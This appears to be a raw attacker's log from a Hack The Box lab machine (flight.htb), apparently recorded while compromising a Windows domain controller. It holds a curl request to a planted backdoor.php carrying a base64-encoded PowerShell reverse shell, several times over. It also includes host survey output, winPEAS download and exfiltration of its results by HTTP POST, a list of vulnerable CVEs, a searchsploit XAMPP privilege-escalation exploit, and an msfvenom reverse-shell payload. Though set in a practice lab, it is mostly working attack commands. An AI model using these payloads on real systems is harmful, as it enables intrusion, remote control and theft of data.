curl -k 'http://school.flight.htb/backdoor.php?cmd=powershell%20-e%20JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4ANAAzACIALAA0ADQAMwApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA%2BACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA%2BACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA%3D'

//SUCCESS!!!

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>


// Survey
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
systeminfo

Host Name:                 G0
OS Name:                   Microsoft Windows Server 2019 Standard
OS Version:                10.0.17763 N/A Build 17763
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Primary Domain Controller
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00429-00521-62775-AA402
Original Install Date:     7/20/2021, 11:21:49 AM
System Boot Time:          3/17/2023, 11:28:42 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware7,1
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
                           [02]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
BIOS Version:              VMware, Inc. VMW71.00V.16707776.B64.2008070230, 8/7/2020
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume3
System Locale:             en-us;English (United States)
Input Locale:              it;Italian (Italy)
Time Zone:                 (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory:     4,095 MB
Available Physical Memory: 2,565 MB
Virtual Memory: Max Size:  5,503 MB
Virtual Memory: Available: 4,212 MB
Virtual Memory: In Use:    1,291 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    flight.htb
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Ethernet0 2
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.11.187
                                 [02]: fe80::b168:4c8f:c6bf:83
                                 [03]: dead:beef::b168:4c8f:c6bf:83
                                 [04]: dead:beef::bd

2023-03-18 00:10:58 EDT -- 
whoami /all
//Mandatory Label\High Mandatory Level       Label            S-1-16-12288
Privilege Name                Description                    State   
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled 
SeCreateGlobalPrivilege       Create global objects          Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

tasklist /svc

netstat -anop TCP

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4764
  TCP    0.0.0.0:88             0.0.0.0:0              LISTENING       652
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       920
  TCP    0.0.0.0:389            0.0.0.0:0              LISTENING       652
  TCP    0.0.0.0:443            0.0.0.0:0              LISTENING       4764
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:464            0.0.0.0:0              LISTENING       652
  TCP    0.0.0.0:593            0.0.0.0:0              LISTENING       920
  TCP    0.0.0.0:636            0.0.0.0:0              LISTENING       652
  TCP    0.0.0.0:3268           0.0.0.0:0              LISTENING       652
  TCP    0.0.0.0:3269           0.0.0.0:0              LISTENING       652
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:8000           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:9389           0.0.0.0:0              LISTENING       2820

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>


-- privesc --
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

cd C:\Users\svc_apache\AppData\Local\Temp
net use \\10.10.16.43\Public

wget https://github.com/carlospolop/PEASS-ng/releases/download/20230312/winPEASany.exe

2023-03-18 00:18:00 EDT -- 
(New-Object System.Net.WebClient).DownloadFile('//10.10.16.43/Public/winPEASany.exe', 'C:\Users\svc_apache\AppData\Local\Temp\wPEAS.exe')
//Fail

2023-03-18 00:19:19 EDT -- 
(New-Object System.Net.WebClient).DownloadFile('http://10.10.16.43:443/winPEASany.exe', 'C:\Users\svc_apache\AppData\Local\Temp\wPEAS.exe')

2023-03-18 00:28:35 EDT -- 
./wPEAS.exe -lolbas log=\\10.10.16.43\Public\wPEAS.out

//[X] Exception: Cannot open "\\10.10.16.43\Public\wPEAS.out" for writing:
//You can't access this shared folder because your organization's security policies block unauthenticated guest access. These policies help protect your PC from unsafe or malicious devices on the network.

2023-03-18 00:30:09 EDT -- 
./wPEAS.exe -lolbas log=wPEAS.out

2023-03-18 00:51:45 EDT -- 
copy wPEAS.out \\10.10.16.43\Public\wPEAS.out
//FAILED

2023-03-18 01:09:13 EDT -- 
nc -lnvp 443 > wPEAS.out

Invoke-RestMethod -Uri http://10.10.16.43:443/wPEAS.out -Method Post -InFile wPEAS.out


// wPEAS OUT
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
[!] CVE-2019-0836 : VULNERABLE
  [>] https://exploit-db.com/exploits/46718
  [>] https://decoder.cloud/2019/04/29/combinig-luafv-postluafvpostreadwrite-race-condition-pe-with-diaghub-collector-exploit-from-standard-user-to-system/

 [!] CVE-2019-0841 : VULNERABLE
  [>] https://github.com/rogue-kdc/CVE-2019-0841
  [>] https://rastamouse.me/tags/cve-2019-0841/

 [!] CVE-2019-1064 : VULNERABLE
  [>] https://www.rythmstick.net/posts/cve-2019-1064/

 [!] CVE-2019-1130 : VULNERABLE
  [>] https://github.com/S3cur3Th1sSh1t/SharpByeBear

 [!] CVE-2019-1253 : VULNERABLE
  [>] https://github.com/padovah4ck/CVE-2019-1253
  [>] https://github.com/sgabe/CVE-2019-1253

 [!] CVE-2019-1315 : VULNERABLE
  [>] https://offsec.almond.consulting/windows-error-reporting-arbitrary-file-move-eop.html

 [!] CVE-2019-1385 : VULNERABLE
  [>] https://www.youtube.com/watch?v=K6gHnr-VkAg

 [!] CVE-2019-1388 : VULNERABLE
  [>] https://github.com/jas502n/CVE-2019-1388

 [!] CVE-2019-1405 : VULNERABLE
  [>] https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/
  [>] https://github.com/apt69/COMahawk

 [!] CVE-2020-0668 : VULNERABLE
  [>] https://github.com/itm4n/SysTracingPoc

 [!] CVE-2020-0683 : VULNERABLE
  [>] https://github.com/padovah4ck/CVE-2020-0683
  [>] https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/PowershellScripts/cve-2020-0683.ps1

 [!] CVE-2020-1013 : VULNERABLE
  [>] https://www.gosecure.net/blog/2020/09/08/wsus-attacks-part-2-cve-2020-1013-a-windows-10-local-privilege-escalation-1-day/

 [*] Finished. Found 12 potential vulnerabilities.

╔══════════╣ Interesting Services -non Microsoft-
╚ Check if you can overwrite some service binary or perform a DLL hijacking, also check for unquoted paths https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services
    ApacheHTTPServer(Apache Software Foundation - Apache HTTP Server)["C:\Xampp\apache\bin\httpd.exe" -k runservice] - Auto - Running
    File Permissions: svc_apache [WriteData/CreateFiles]
    Possible DLL Hijacking in binary folder: C:\Xampp\apache\bin (svc_apache [WriteData/CreateFiles], Users [AppendData/CreateDirectories WriteData/CreateFiles])
    Apache/2.4.52 (Win64)

╔══════════╣ Firewall Rules
╚ Showing only DENY rules (too many ALLOW rules always) 
    Current Profiles: DOMAIN
    FirewallEnabled (Domain):    True
    FirewallEnabled (Private):    True
    FirewallEnabled (Public):    True

╔══════════╣ Searching executable files in non-default folders with write (equivalent) permissions (can be slow)
     File Permissions "C:\xampp\*

searchsploit -x 50337     
  Exploit: XAMPP 7.4.3 - Local Privilege Escalation
      URL: https://www.exploit-db.com/exploits/50337
     Path: /usr/share/exploitdb/exploits/windows/local/50337.ps1
    Codes: CVE-2020-11107
 Verified: False
File Type: ASCII text

searchsploit -m 50337

// Create a Windows x64 reverse shell exe/dll
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.43 LPORT=6969 -f exe -o rev.exe


>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>


>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>


// STARTING AGAIN from Break
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

// Rev-Shell
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
sudo rlwrap -cAr nc -lvnp 443

2023-03-30 18:31:32 EDT -- 
curl -k 'http://school.flight.htb/backdoor.php?cmd=powershell%20-e%20JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4ANAA0ACIALAA0ADQAMwApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA%2BACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA%2BACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA%3D'

//SUCCESS!!!

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>


// Survey
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
netstat -anop tcp

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4944
  TCP    0.0.0.0:88             0.0.0.0:0              LISTENING       648
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       916
  TCP    0.0.0.0:389            0.0.0.0:0              LISTENING       648
  TCP    0.0.0.0:443            0.0.0.0:0              LISTENING       4944
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:464            0.0.0.0:0              LISTENING       648
  TCP    0.0.0.0:593            0.0.0.0:0              LISTENING       916
  TCP    0.0.0.0:636            0.0.0.0:0              LISTENING       648
  TCP    0.0.0.0:3268           0.0.0.0:0              LISTENING       648
  TCP    0.0.0.0:3269           0.0.0.0:0              LISTENING       648
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:8000           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:9389           0.0.0.0:0              LISTENING       2784


#Diff from Nmap scan
//TCP    0.0.0.0:8000





>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>





>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>







>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>



